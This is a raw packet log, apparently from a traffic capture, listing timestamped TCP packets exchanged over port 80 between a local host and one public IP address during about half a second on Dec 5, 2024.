Dec 5, 2024 21:50:13.852360010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.852406979 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.852430105 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.853168964 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.853213072 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.853281021 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.853940964 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.853984118 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.854111910 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.854151011 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.854782104 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.854967117 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.855010986 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.855602026 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.855647087 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.855808973 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.856111050 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.856415987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.856466055 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.856533051 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.856575966 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.857233047 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.857279062 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.857328892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.857367039 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.858105898 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.858323097 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.858361959 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.858875036 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.858958006 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.858997107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.859669924 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.859714031 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.859803915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.860517979 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.860557079 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.860627890 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.861073017 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.861597061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.861646891 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.861725092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.861764908 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.862116098 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.862204075 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.862246990 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.862958908 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.863065004 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.863107920 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.863733053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.863775969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.863826990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.864563942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.864610910 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.864691019 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.865410089 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.865454912 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.865505934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.865746021 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.866348982 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.866559029 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.866600037 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.867012978 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.867063046 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.867120028 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.867357969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.867815018 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.867855072 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.867928982 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.867964983 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.868633032 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.868673086 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.868748903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.868792057 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.869458914 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.869477987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.869502068 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.869514942 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.870249987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.870388031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.870433092 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.871104002 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.871340990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.871422052 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.871895075 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.871992111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.872035980 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.872699022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.872834921 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.872879028 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.873523951 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.873560905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.873631001 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.873943090 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.874320984 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.874372005 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.874438047 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.874478102 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.875169992 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.875205040 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.875282049 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.875324965 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.876172066 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.876209021 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.876236916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.876279116 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.876852989 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.876895905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.876966000 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.877010107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.877595901 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.877645016 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.877724886 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.877943993 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.878412008 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.878458977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.878463030 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.879223108 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.879268885 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.879436016 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.880058050 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.880099058 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.880172968 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.880213976 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.880846977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.880994081 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.881036043 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.881635904 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.881735086 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.881736994 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.881776094 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.882450104 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.882502079 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.882610083 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.882687092 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.883284092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.883327961 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.883403063 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.883445024 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.884186029 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.884229898 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.884305954 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.884350061 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.884901047 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.884948015 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.885040045 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.885175943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.885713100 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.885757923 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.885812044 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.885875940 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.886507034 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.886554956 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.886622906 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.886663914 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.887336969 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.887381077 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.887473106 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.887518883 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.888156891 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.888243914 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.038235903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.038384914 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.038486958 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.038542032 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.038707972 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.038757086 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.039524078 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.039549112 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.039561033 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.039573908 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.039599895 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.039659023 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.040340900 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.040380955 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.040446043 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.040488005 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.041161060 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.041248083 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.041290998 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.041975021 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.042078018 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.042118073 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.042779922 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.042820930 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.042876005 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.043602943 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.043644905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.043657064 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.044405937 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.044446945 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.044569969 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.044606924 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.045228958 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.045366049 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.045411110 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.046041965 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.046171904 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.046212912 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.046912909 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.046952009 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.047012091 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.047668934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.047708035 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.047744989 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.048471928 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.048508883 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.048527956 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.049323082 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.049364090 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.049423933 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.049457073 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.050086975 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.050200939 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.050241947 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.050992012 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.051110983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.051151991 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.051743031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.051780939 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.051850080 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.052537918 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.052578926 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.052643061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.053359985 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.053402901 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.053453922 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.053488016 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.054188013 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.054274082 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.054311037 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.055028915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.055041075 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.055077076 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.055800915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.055835009 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.055852890 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.056587934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.056628942 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.056694031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.057446003 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.057483912 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.057514906 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.057553053 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.058255911 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.058401108 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.058439970 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.059068918 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.059103012 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.059179068 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.059240103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.059878111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.059925079 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.059983969 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.060699940 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.060750008 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.060828924 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.061501980 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.061539888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.061595917 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.061939955 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.062318087 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.062455893 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.062495947 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.063153982 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.063347101 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.063385963 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.063940048 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.063976049 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.064037085 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.064735889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.064774036 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.064788103 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.065589905 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.065633059 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.065665960 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.065706968 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.066368103 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.066421986 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.066457987 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.067192078 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.067311049 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.067357063 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.067969084 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.068006992 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.068109035 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.068799019 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.068834066 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.068911076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.069614887 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.069649935 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.069711924 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.069751024 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.070415974 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.070538998 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.070579052 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.071270943 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.071383953 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.071423054 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.072072983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.072113991 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.072186947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.072870970 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.072911978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.072981119 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.073698997 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.073739052 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.073812008 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.073851109 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.074502945 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.074598074 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.074637890 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.075320959 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.075361013 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.075423002 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.075464964 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.076105118 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.076155901 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.076226950 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.076265097 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.076976061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.077009916 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.077080011 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.077117920 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.077848911 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.077887058 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.077991009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.078593016 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.078634024 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.078948975 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.079396009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.079437971 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.079483032 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.079516888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.080169916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.081950903 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.229708910 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.229970932 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.230022907 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.230036020 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.230046988 CET	80	49710	45.130.41.93	192.168.2.5
